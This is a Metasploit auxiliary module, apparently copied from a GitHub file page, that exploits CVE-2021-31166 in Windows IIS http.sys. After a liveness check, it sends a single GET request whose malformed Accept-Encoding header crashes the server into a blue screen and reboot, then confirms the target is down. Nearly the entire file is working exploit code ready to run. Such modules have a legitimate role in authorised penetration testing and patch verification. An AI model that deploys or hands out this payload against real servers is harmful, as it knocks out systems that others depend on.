-
Notifications
You must be signed in to change notification settings - Fork 0
/
rb_dos_iis_2021_31166.rb
110 lines (97 loc) · 3.42 KB
/
rb_dos_iis_2021_31166.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows IIS HTTP Protocol Stack DOS',
'Description' => %q{
This module exploits CVE-2021-31166, a UAF bug in http.sys
that was patched by Microsoft in May 2021, to cause a BSOD and
crash the target IIS server. Successful exploitation will result
in the target BSOD'ing and the target server rebooting.
},
'License' => MSF_LICENSE,
'Author' => [
'Max', # Aka @_mxms. Vulnerability discovery
'Stefan Blair', # Aka @fzzyhd1. Vulnerability discovery
'Axel Souchet', # Aka @0vercl0k. PoC exploit
'Maurice LAMBERT <mauricelambert434[at]gmail.com>' # msf module
],
'Platform' => 'win',
'References' => [
['CVE', '2021-31166'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31166'],
['URL', 'https://github.com/mauricelambert/CVE-2021-31166'],
['URL', 'https://twitter.com/metr0/status/1392631376592076805'],
[
'URL',
'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166'
]
],
'DisclosureDate' => '2021-05-11',
'Notes' => {
'Stability' => [CRASH_OS_RESTARTS],
'Reliability' => [IOC_IN_LOGS],
'SideEffects' => [SCREEN_EFFECTS]
},
)
)
register_options(
[
OptString.new(
'TARGETURI', [true, 'The URI of the IIS Server.', '/'],
)
]
)
end
# This module performs a DOS attack using a simple HTTP request.
def run
print_status('Connecting to target to make sure its alive...')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, ''),
'method' => 'GET'
)
if res.nil?
fail_with(
Failure::Unreachable,
"#{peer} - Could not connect to the target IIS server - no response"
)
end
print_good('Successfully connected to target. Sending payload...')
payload = (
"#{Rex::Text.rand_text_alpha(5)}, #{Rex::Text.rand_text_alpha(3)}, ,"
)
payload = {
'Accept-Encoding' => payload
}
begin
send_request_cgi({
'uri' => normalize_uri(target_uri.path, ''),
'timeout' => 1, # short timeout -> the server should not respond
'method' => 'GET',
'headers' => payload
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
ensure
print_good('Payload was sent to the target server.')
print_status('Checking that the server is down...')
end
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, ''),
'method' => 'GET'
)
if res.nil?
print_good('Target is down.')
else
print_error(
'Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable.'
)
end
end
end